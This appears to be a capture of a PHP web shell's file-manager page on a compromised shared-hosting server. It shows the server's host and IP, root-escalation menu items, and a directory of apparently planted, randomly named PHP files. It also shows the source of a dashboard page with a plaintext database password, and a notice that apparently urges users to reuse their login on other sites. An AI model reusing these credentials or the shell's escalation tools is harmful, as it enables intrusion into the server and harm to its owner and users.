Linux moon.hostseba.com 4.18.0-553.51.1.lve.el8.x86_64 #1 SMP Tue May 6 15:14:12 UTC 2025 x86_64
LiteSpeed
Server IP : 103.174.152.68 & Your IP : 216.73.216.121
Domains :
Cant Read [ /etc/named.conf ]
User : julaysp1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
julaysp1 /
findus.36julay.space /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2025-01-27 18:20
adi
[ DIR ]
drwxr-xr-x
2025-09-05 06:04
.772428730393532.php
760
B
-rw-r--r--
2025-09-04 20:51
96i.php
13.63
KB
-rw-r--r--
2025-08-31 20:53
all.zip
4.05
KB
-rw-r--r--
2025-01-27 18:51
dashboard.php
5.93
KB
-rw-r--r--
2025-01-27 19:00
error_log
17.52
KB
-rw-r--r--
2025-09-04 20:51
goods.php
583
B
-rw-r--r--
2025-09-03 22:50
index.php
3.99
KB
-rw-r--r--
2025-01-27 19:01
logout.php
181
B
-rw-r--r--
2025-01-27 17:06
nxx.php
52.9
KB
-rw-r--r--
2025-08-31 20:47
option.php
61.36
KB
-r--r--r--
2025-08-29 17:47
utfvztvg.php
760
B
-rw-r--r--
2025-08-31 20:43
wp-blog-header.php
2.73
KB
-rw-r--r--
2025-09-01 07:25
wp-cron.php
2.73
KB
-rw-r--r--
2025-09-01 07:25
x-cp-KHoU3LOW.php
448
B
-rw-r--r--
2025-09-05 11:04
x-cp-cDequjHb.php
448
B
-rw-r--r--
2025-09-05 13:26
Save
Rename
<?php session_start(); // Check if the user is logged in if (!isset($_SESSION['loggedin']) || $_SESSION['loggedin'] !== true) { header("Location: index.php"); exit; } $email = $_SESSION['user_email']; // Database connection $conn = new mysqli('localhost', 'julaysp1_new_site', '[%xZ+Gh$&;(-', 'julaysp1_new_site'); // Check connection if ($conn->connect_error) { die('Connection failed: ' . $conn->connect_error); } // Fetch user details $stmt = $conn->prepare("SELECT token, balance, status FROM users WHERE email = ?"); $stmt->bind_param("s", $email); $stmt->execute(); $stmt->bind_result($token, $balance, $status); $stmt->fetch(); $stmt->close(); $conn->close(); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Dashboard</title> <!-- Bootstrap CSS --> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha3/dist/css/bootstrap.min.css" rel="stylesheet"> <!-- SweetAlert2 CSS --> <link href="https://cdn.jsdelivr.net/npm/sweetalert2@11.3.5/dist/sweetalert2.min.css" rel="stylesheet"> <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap" rel="stylesheet"> <style> body { background: linear-gradient(to right, #4e54c8, #8f94fb); color: #fff; min-height: 100vh; display: flex; justify-content: center; align-items: center; font-family: 'Roboto', sans-serif; } .container { max-width: 800px; width: 100%; background: #fff; border-radius: 10px; padding: 30px; box-shadow: 0 8px 20px rgba(0, 0, 0, 0.3); color: #333; } .header { text-align: center; margin-bottom: 30px; } .header h1 { font-size: 2rem; font-weight: 700; color: #4e54c8; } .notice { background: #4e54c8; color: #fff; padding: 15px; border-radius: 5px; margin-bottom: 20px; font-size: 1rem; text-align: center; } .account-link { margin-bottom: 20px; } .input-group { display: flex; align-items: center; margin-bottom: 10px; } .input-link { padding: 10px; flex-grow: 1; border: 1px solid #ccc; border-radius: 5px; outline: none; } .copy-btn { cursor: pointer; padding: 10px 15px; background-color: #4e54c8; color: white; border: none; border-radius: 5px; transition: background-color 0.3s; } .copy-btn:hover { background-color: #3c44a8; } .logout-btn { display: block; width: 100%; text-align: center; background-color: #dc3545; color: white; padding: 10px; border: none; border-radius: 5px; text-decoration: none; font-weight: 500; transition: background-color 0.3s; } .logout-btn:hover { background-color: #a71d2a; } </style> </head> <body> <div class="container"> <div class="header"> <h1>Welcome to Your Dashboard</h1> </div> <div class="notice"> <strong>You are logged in as <span><?php echo htmlspecialchars($email); ?></span></strong> </div> <div class="account-link"> <p style="color: green;">প্রত্যেকের জন্য আলাদা আলাদা লিংক সিমেস্ট চালু শুধু and এই সাইটে যেই ইমেইল পাসওর্য়াড দিয়ে লগইন করেছেন, এইলিংক গুলো তে ডুকে একই তথ্য দিয়ে লগইন করবেন।</p> <div class="input-group"> <input type="text" class="input-link" id="link1" value="https://36julay.space/index.php?text_token=<?php echo urlencode($token); ?>" readonly> <button class="copy-btn" onclick="copyToClipboard('link1')">Copy</button> </div> <div class="input-group"> <input type="text" class="input-link" id="link2" value="https://37julay.space/index.php?text_token=<?php echo urlencode($token); ?>" readonly> <button class="copy-btn" onclick="copyToClipboard('link2')">Copy</button> </div> </div> <div class="text-center"> <a href="logout.php" class="logout-btn">Logout</a> </div> </div> <!-- Bootstrap JS --> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha3/dist/js/bootstrap.bundle.min.js"></script> <!-- SweetAlert2 JS --> <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.3.5/dist/sweetalert2.all.min.js"></script> <script> // Copy to clipboard function function copyToClipboard(linkId) { var copyText = document.getElementById(linkId); copyText.select(); copyText.setSelectionRange(0, 99999); // For mobile devices // Copy the text inside the text field document.execCommand("copy"); // Show SweetAlert success notification Swal.fire({ icon: 'success', title: 'Copied!', text: 'The link has been copied to your clipboard.', confirmButtonText: 'OK', timer: 2000 }); } </script> </body> </html>